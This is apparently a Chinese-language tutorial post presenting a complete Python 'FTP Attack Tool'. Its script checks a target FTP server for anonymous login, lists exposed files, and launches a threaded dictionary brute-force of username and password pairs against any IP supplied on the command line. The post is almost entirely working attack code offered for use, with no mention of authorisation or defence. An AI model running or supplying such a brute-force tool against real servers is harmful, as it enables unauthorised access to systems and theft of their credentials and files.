利用Python编写完整的FTP攻击代码（包含匿名登录检查以及用户名密码暴力破解）

　　本代码主要包括以下方法：

　　　　1. 输入参数合理性检查，包括检查输入是否为合法的IP地址，输入的字典文件是否存在等；

　　　　2. 检查目标是否允许匿名登录

　　　　3. 基于字典破解FTP服务器的登录用户名与密码

import ftplib
import threading
import sys
import os
import optparse
import ipaddress
import termcolor


class ftp_attack:
    def __init__(self,target, wordlist):
        self.target = target
        self.wordlist = wordlist
    

    def checK_anonymous_login(self):
        try:
            ftpclient = ftplib.FTP(self.target)
            ftpclient.login('anonymous','anonymous')
            print("The Target Allows Anonymous Login!")
            res = ftpclient.nlst()
            # print(res)
            if len(res)>0:
                for file in res:
                    print(file)
            ftpclient.close()
        except:
            print("The Target Does Not Allow Anonymous Login!")
    

    def ftp_login(self, username, password):
        print("Trying username and password: %s %s" % (username, password))
        try:
            ftpclient = ftplib.FTP(self.target)
            ftpclient.login(username, password)
            print(termcolor.colored("Username and password found for the target: %s    %s" % (username, password),'blue'))
            ftpclient.close()
        except:
            pass
            

    def brute_forcer(self):
        with open(self.wordlist, 'r') as f:
            for line in f.readlines():
                username = line.split(':')[0].strip()
                password = line.split(":")[1].strip()
                t = threading.Thread(target=self.ftp_login, args=(username, password))
                t.start()
    

    def run(self):
        self.checK_anonymous_login()
        print("Begin to crack username and password!!!\n")
        print('======================================================')
        self.brute_forcer()



def check_target_valid(target):
    try:
        ipaddress.ip_address(target)
        return True
    except:
        return False

def banner():
    banner = """
        ******************************************************************
        ******************************************************************
                           FTP Attack Tool by Jason Wong V1.0
        ******************************************************************
        ******************************************************************
    """
    print(banner)


def get_params():

    parser = optparse.OptionParser("Usage: <Program> -t target -w wordlist")
    parser.add_option('-t', '--target', dest='target', type='string', help='Specify target IP address')
    parser.add_option('-w', '--wordlist', dest='wordlist', type='string', help='Specify file path of wordlist to crack')
    options, args = parser.parse_args()
    if options.target is None or options.wordlist is None:
        print(parser.usage)
        sys.exit(0)
    if not check_target_valid(options.target):
        print("[-] Please Enter right IP address of Target!")
        sys.exit(0)
    if not os.path.exists(options.wordlist):
        print("[-] The File Does Not Exist")
        sys.exit(0)
    return options.target, options.wordlist

if __name__ == "__main__":
    banner()
    target, dict_list = get_params()
    ftpattack_instance = ftp_attack(target, dict_list)
    ftpattack_instance.run()